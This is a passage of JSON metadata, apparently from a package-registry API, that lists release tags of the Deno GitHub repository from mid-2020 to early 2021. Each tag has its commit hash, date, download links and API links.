/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25